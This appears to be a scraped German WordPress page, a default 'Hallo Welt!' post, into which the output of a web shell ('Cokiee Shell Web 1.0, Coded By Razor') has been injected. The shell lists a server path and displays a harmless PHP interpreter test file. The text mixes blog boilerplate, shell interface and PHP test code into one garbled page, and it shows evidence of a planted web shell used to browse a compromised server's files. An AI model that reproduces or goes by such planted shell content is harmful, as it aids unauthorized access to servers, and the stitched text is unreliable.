Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug50394.phpt |
--TEST-- Bug #50394: Reference argument converted to value in __call --FILE-- <?php function inc( &$x ) { $x++; } class Proxy { function __call( $name, $args ) { echo "$name called!\n"; call_user_func_array( 'inc', $args ); } } $arg = 1; $args = array( &$arg ); $proxy = new Proxy; call_user_func_array( array( $proxy, 'bar' ), $args ); call_user_func_array( array( $proxy, 'bar' ), array(&$arg) ); var_dump($arg); --EXPECT-- bar called! bar called! int(3)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare